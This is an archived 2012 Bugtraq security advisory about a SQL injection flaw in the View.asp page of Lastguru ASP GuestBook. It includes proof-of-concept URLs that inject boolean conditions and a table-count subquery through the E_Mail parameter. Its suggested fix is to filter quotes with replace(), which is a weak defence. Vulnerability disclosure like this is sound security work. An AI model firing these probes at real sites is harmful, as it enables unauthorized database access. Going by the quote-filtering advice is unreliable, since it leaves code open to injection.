lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201203040521.q245LaDP011395@sf01web1.securityfocus.com>
Date: Sun, 4 Mar 2012 05:21:36 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability

Title: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability

Product : Lastguru ASP GuestBook

Version : Free Version

Vendor: http://www.LastGuru.com

Class:  Input Validation Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-03-04

Updated:  

Impact : Medium (CVSSv2 Base : 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P)

Bug Description :
Page 'View.asp' of Lastguru ASP GuestBook(Free Version) is vulnerable with SQL Injection Vulnerability.

POC:
#-------------------------------------------------------------
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='a
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 'a'='b
http://victim/View.asp?E_Mail=webmaster@lastguru.com' and 0<(select count(*) from [book]) and 'a'='a
etc...
#-------------------------------------------------------------

Advice:
Use 'replace()' for filtering single quote and other dangerous symbols.

Credits : This vulnerability was discovered by demonalex@....com
mail: demonalex@....com / ChaoYi.Huang@...nect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ